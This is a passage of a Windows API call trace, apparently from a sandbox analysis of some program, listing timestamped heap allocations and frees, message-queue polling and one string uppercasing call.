dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458818 | out: hHeap=0x12c0000) returned 1 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491b98 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14bde38 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.750] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be048 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0119.750] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3148 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2e0 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef560 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedf8 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300dc8 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ce8 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fed80 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300d58 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300d90 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300b98 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fed30 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fece0 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300d20 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd220 | out: hHeap=0x12c0000) returned 1 [0119.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb50 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd508 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff410 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff488 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef510 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd268 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd280 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef510 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xca) returned 0x1302b30 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef550 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2e0 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2e0 | out: hHeap=0x12c0000) returned 1 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0119.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0119.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0119.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef510 | out: hHeap=0x12c0000) returned 1 [0119.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c211) returned 0x1320068 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bde38 | out: hHeap=0x12c0000) returned 1 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec90 | out: hHeap=0x12c0000) returned 1 [0119.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38422) returned 0x14bffb0 [0119.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303e48 | out: hHeap=0x12c0000) returned 1 [0119.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1320068 | out: hHeap=0x12c0000) returned 1 [0119.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.794] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef510 [0119.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6c0 [0119.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300e00 [0119.794] CharUpperBuffW (in: lpsz="DBRUAIEIBZEWRGBQ", cchLength=0x10 | out: lpsz="DBRUAIEIBZEWRGBQ") returned 0x10 [0119.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300e00 | out: hHeap=0x12c0000) returned 1 [0119.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec90 [0119.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef6c0 [0119.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0119.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2e0 [0119.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef560 [0119.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38422) returned 0x1303e48 [0119.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef4e0 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0119.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef550 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd280 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38422) returned 0x14f83e0 [0119.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0119.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0119.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0119.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0119.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0119.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3610 [0119.814] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fece0 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd268 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5b0 [0119.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd268 | out: hHeap=0x12c0000) returned 1 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb50 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd220 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5c0 [0119.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0119.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.814] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fed30 [0119.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5c0 [0119.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedf8 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd268 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0119.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.815] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0119.815] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.815] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458818 [0119.816] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0119.816] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.816] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.816] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0119.817] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14588d8 | out: hHeap=0x12c0000) returned 1 [0119.817] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0119.817] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 